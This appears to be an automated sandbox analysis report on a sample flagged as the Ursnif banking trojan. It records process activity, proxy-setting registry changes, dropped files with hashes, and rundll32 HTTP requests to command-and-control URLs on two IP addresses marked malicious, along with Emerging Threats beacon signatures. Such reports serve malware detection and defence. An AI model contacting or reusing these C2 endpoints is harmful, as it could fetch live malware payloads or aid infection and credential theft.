C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

—

mshta.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll

Add for printing

Total events

3 728

Read events

3 696

Write events

Delete events

Modification events


(PID) Process:	(1932) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:	write	Name:	CheckSetting
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB01000000088AF72B0747534094337F63DE35C94A0000000002000000000010660000000100002000000011FEF86B13D2317ECFBC9E70116CDFB9A7CD7F543A075C03CC76CC912F264439000000000E800000000200002000000026CA1581DBB77FE930F5A83D64D684A3EC5D7D040FA6333ECA358AABBD9E4F653000000084DE4C22D7FBFAE8BB753B24F10A67FD39BCDA5EF3B3D5F6251B6B014DDF2A3E50A9FC63B1720CD40CC069882544D24840000000FDF9360EE1EDFED7CC3CBB9BF8BF87D4700CD94F4124E1BA2BFA835082C7FABBC267D630880A9AE07CFCECD03CA33CBBFFDD47E126FA7FED9730D5B400763556
(PID) Process:	(1932) explorer.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Action Center\Checks\{01979c6a-42fa-414c-b8aa-eee2c8202018}.check.100
Operation:	write	Name:	CheckSetting
Value: 01000000D08C9DDF0115D1118C7A00C04FC297EB01000000088AF72B0747534094337F63DE35C94A00000000020000000000106600000001000020000000491BDBB5E321AB6A207EA6E4E4D8F482B7EFA4062E01A8F609A5F5AF01486C78000000000E8000000002000020000000025646E525449C6074A98082A2ACC1F849AFDB385E7BF59C9456D3AF99A19778B000000098787313409830CA7BDDE8399F42F514B5AC33E58E8545CA136F81295542540CA3D811CB6132A68419F671035849B62623434BB168A14D698A4C31AD486702E6CA5DC72B6F75608A3FA4A70BDEFC69F5539D67802036DD31DE93D820C843C03A406C8E6C744906AD7A2EE968DF1DA38602F88B76EB1C2B1E09334C7F0746A3C2A101C4C2769720E8A0040B3BA644100D62C0CE61CCB80F6DE5ABE905F7B2898AAD509BD5E77010E8335DAF229EE653AE400000005B5761FBB9FF8B2D1D6D7E7D69FDFFB2D71FE44E8E1E21496605A0F3DD923B10233E16A100FAD1FD622199D8B8897C2C3AD4759F04186C4AD699C6A7A25532D0
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:	write	Name:	ProxyEnable
Value: 0
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:	write	Name:	SavedLegacySettings
Value: 460000008F000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:	write	Name:	CachePrefix
Value: Cookie:
(PID) Process:	(2468) rundll32.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:	write	Name:	CachePrefix
Value: Visited:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2652	powershell.exe	C:\Users\admin\AppData\Local\Temp\ofpcssg4.cmdline		text
		MD5:69271CBD7E5AA6E24748D8007F011206	SHA256:3124220EF8C59D1864277CB8E1339CFAF129117560AB1498762276986E3C5921
2432	csc.exe	C:\Users\admin\AppData\Local\Temp\ofpcssg4.dll		executable
		MD5:F48E2D17D770944C5469EA1DD044F322	SHA256:9EAF427332BD3A9D505557DE5F8DA7F663A41F700B82D8F557D3275021222A1B
2648	cvtres.exe	C:\Users\admin\AppData\Local\Temp\RESA111.tmp		binary
		MD5:8CA000C71E5C2E195EDAC7FA454639DD	SHA256:235DBE51D5F0A49414D1E2803CA788FCA61150A0B725DE45FA4F79CA11C54F0F
2652	powershell.exe	C:\Users\admin\AppData\Local\Temp\35skutgs.cor.psm1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
2652	powershell.exe	C:\Users\admin\AppData\Local\Temp\ofpcssg4.0.cs		text
		MD5:CAED0B2E2CEBAECD1DB50994E0C15272	SHA256:21210B9BAAFB8B03AB0EF625312973A77BB5ABA856C91892B65826E8B7C3B150
2432	csc.exe	C:\Users\admin\AppData\Local\Temp\CSCF2A8F8C9D2C646179DF893D2D15BC2C7.TMP		binary
		MD5:4A93D1EE85A2A724545B1E1C913F3C4A	SHA256:4B0627305CCD0A7B657B07A18DB8D7BE1E12100A0C05E905191E83D2052810EF
2652	powershell.exe	C:\Users\admin\AppData\Local\Temp\uemrrwyn.kkj.ps1		binary
		MD5:C4CA4238A0B923820DCC509A6F75849B	SHA256:—
2652	powershell.exe	C:\Users\admin\AppData\Local\Temp\oflsl3j3.0.cs		text
		MD5:CA8887EACD573690830F71EFAF282712	SHA256:568B0C1155379C88E91F904F4E70A3608FBF664EF890309CD705A7C5EB3232C3
2800	csc.exe	C:\Users\admin\AppData\Local\Temp\CSCBBF55137617E4DE8913FA0B3BE64DA93.TMP		binary
		MD5:A6716F5C3111C38BB064B5C2BC1B8DFE	SHA256:44CCE3537C3266F4AECD4BED17799DCDF0BC39D0C19A084653F2C056E64FCEDB
2652	powershell.exe	C:\Users\admin\AppData\Local\Temp\oflsl3j3.cmdline		text
		MD5:FE89AC1B689348B87A6117A9FCBEE028	SHA256:DD631CE5631B00A09E2ACB7108867D1A333B5C351DBEA360130E03760B0EC582

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2468	rundll32.exe	GET	200	45.11.182.38:80	http://45.11.182.38/zerotohero/t4JS4k63C_2F5/P_2FDJ54/j4ZPjkWZeExMyuq9C4loNfm/r0lqGSFdg2/WxgfQuGW5LTGS1eHt/bQ2zoWvu67eU/bwozWnF0qGC/qaMoLvlS5AGJ_2/BhNR9HIXDVNr_2Fn9IXFU/vYZVbft6xzZLuHmI/dJJEMyxX5j1rrWt/T3aPNdgcOF0eYeLEXY/qpThF9zp6/SvMbrNXu2Hf6NLJk2OKR/Wc6RPIUo98PnKCt4s_2/F1vaR9Gjhjbj6q59qdr9cq/7rlQ8WgffMwPv/geQA6Awm/YBET9KIXIKPTWxwtZb3fpbo/OfRfP8AU49/DDvkddn.asi	DE	binary	229 Kb	malicious
2468	rundll32.exe	GET	200	45.11.182.38:80	http://45.11.182.38/zerotohero/ynuhKt6h_2FXoJT/OgjLGlNpJMhRepFJyn/779OtyO0R/_2FHsjzioOm6p4ZrRl23/w9sFrpjrZzdawFwuN3_/2Br4WVkNf2Bzwn3PtEcLMq/qVgPhjszafiHG/nPEfl8tE/tULwMQlc2njy65PXY5vNlcq/0_2BgWuKQa/bjx5OO7vblJNrVrOg/z8_2Fgt_2FGw/wE3gK7hNkIy/Co8fn748Om1SPl/ZUAeL9_2BAeByf_2FxgLI/dJWsn1pf57CibWBj/txHVCgEJyTXgCAi/O6882wHziQAHIpj9zS/OlswXsc35HC/YZ.asi	DE	binary	1.87 Kb	malicious
2468	rundll32.exe	GET	200	45.11.182.38:80	http://45.11.182.38/zerotohero/NnPq5yKDalP9pVl87dLifJ/8VUyKGEAcfqJH/kLok4qpu/CZVGdFRSQc6SxbXIxGarAaz/kZAS9oPiVT/89_2Biu9YxTzi79Kl/VbRoTc2JRjpv/3sbjx3mM3Yc/i07CJUeeBxoQDj/L2MGxY7rawacYNexfhBQk/Yo6TjPzaRUQFG8UK/1dOf1yrSy6YpLbI/tahW8dTHBnaocWyrLE/I5wWseXni/keyrSrZ1CD5CHsmYk8L0/3Qc7rTUjtw_2FZRbyfv/HAeudN_2BDF6CmdIeRFb9D/CTUsbtU7ENp4Y/t.asi	DE	binary	178 Kb	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
324	svchost.exe	224.0.0.252:5355	—	—	—	unknown
1932	explorer.exe	45.155.249.220:80	—	vServer.site LTD	DE	malicious
2468	rundll32.exe	45.11.182.38:80	—	GleSYS AB	DE	malicious

DNS requests

No data

Threats

PID	Process	Class	Message
2468	rundll32.exe	Malware Command and Control Activity Detected	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
2468	rundll32.exe	Malware Command and Control Activity Detected	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)
2468	rundll32.exe	Malware Command and Control Activity Detected	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)
2468	rundll32.exe	Malware Command and Control Activity Detected	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)

Add for printing

No debug info

General Info

f8a1d78eb7691f90053a5d7ad70588bed4c4a5cdd7bc949c368d8c2bc62f95c4.bin

1FF3761D62CC5EE7C888A8C1BDD9D1AC

093CB13D256FF3E367CC8C60FE68F96582A35F29

F8A1D78EB7691F90053A5D7AD70588BED4C4A5CDD7BC949C368D8C2BC62F95C4

12288:/+WNeJLmTo/dgvHKRNR7PlB5D9Di/2ytQLP647vpvWhRodzXo/fGRAkMwFroD:/+Q46To/dgPOVP35ZWrs6kvonx6o

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Loads dropped or rewritten executable

Application was injected by another process

Runs injected code in another process

Starts CMD.EXE for self-deleting

Change Internet Settings

Connects to the CnC server

URSNIF was detected

Unusual connection from system programs

Steals credentials

Actions looks like stealing of personal data

SUSPICIOUS

Uses RUNDLL32.EXE to load library

Reads the Internet Settings

Executable content was dropped or overwritten

HTML script is executed

Starts CMD.EXE for commands execution

Runs PING.EXE to delay simulation

Connects to the server without a host name

Starts POWERSHELL.EXE for commands execution

Possibly malicious use of IEX has been detected

INFO

The process checks LSA protection

Reads the machine GUID from the registry

Create files in a temporary directory

Checks proxy server information

Reads Internet Explorer settings

Manual execution by a user

Checks supported languages

Malware configuration

Static information

TRiD

EXIF

EXE

Summary

DOS Header

PE Headers

Sections

Resources

Imports

Exports

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files